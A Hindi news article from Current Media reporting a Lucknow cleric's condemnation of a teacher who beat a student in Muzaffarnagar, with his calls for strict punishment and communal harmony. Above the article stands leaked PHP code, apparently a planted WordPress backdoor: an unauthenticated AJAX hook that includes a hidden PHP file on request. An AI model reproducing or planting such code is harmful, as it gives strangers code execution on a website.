if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }छात्र की पिटाई की घटना बेहद शर्मनाक: मौलाना खालिद रशीद - Current Media

छात्र की पिटाई की घटना बेहद शर्मनाक: मौलाना खालिद रशीद

लखनऊ । इमाम ईदगाह लखनऊ मौलाना खालिद रशीद फरंगी महली चेयरमैन इस्लामिक सेन्टर आॅफ इण्डिया लखनऊ ने मुज़फ्फरनगर के एक स्कूल में छात्र की पिटाई की घटना पर गहरा दुख व्यक्त किया है। उन्होंने ऐसी मानवीय त्रासदी के लिये ज़िम्मेदार शिक्षिका के खिलाफ सख्त कार्यवाही करने की मांग की है। मौलाना फरंगी महली ने कहा कि शैक्षिक संस्थान छात्रों के लिये दयालू माता-पिता की तरह हैं। धर्म, जाति, समुदाय, रंग, नस्ल, क्षेत्र और किसी भी अन्य नाम और आधार पर छात्रों के बीच पूर्वाग्रह और नफ़रत पैदा करना निसंदेह एक बड़ा अपराध है। किसी भी सभ्य और शिक्षित समाज में ऐसा अपराध बर्दाश्त नहीं किया जा सकता।
उन्होंने कहा कि स्कूलों में शिक्षक नई पीढ़ी के निर्माता होते हैं। उन्हें शिक्षा के साथ-साथ विद्यार्थियों के संस्कार एवं चरित्र निर्माण पर भी पूरा ध्यान देना चाहिये। यदि वे अपने कर्तव्यों एवं उत्तरदायित्वों का निर्वहन अच्छे ढंग से नहीं करेंगे तो विद्यार्थी शिक्षा से दूर हो जायेंगे तथा उनका भविष्य अंधकारमय हो जायेगा। यह देश और राष्ट्र के लिये बहुत हानिकारक होगा।
मौलाना फरंगी महली ने सरकार से दोषी शिक्षिका को कड़ी सजा देने और उस मासूम छात्र को सर्वोत्तम शिक्षा प्रदान करने का आग्रह किया। मौलाना ने आगे कहा कि प्यारे देश में शांति, आपसी भाईचारा, धार्मिक सहिष्णुता, राष्ट्रीय एकता,सांप्रदायिक सद्भाव और संयुक्त विरासत की परम्पराएं सदियों पुरानी हैं। यहां के अधिकांश निवासी उनका अनुसरण करते हैं। इस लिए इन प्राचीन परम्पराओं को बनाए रखना और देश के संविधान और कानून की सर्वोच्चता स्थापित करना, साथ ही न्याय और निष्पक्षता की आवश्यकताओं को पूरा करना बहुत महत्वपूर्ण है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …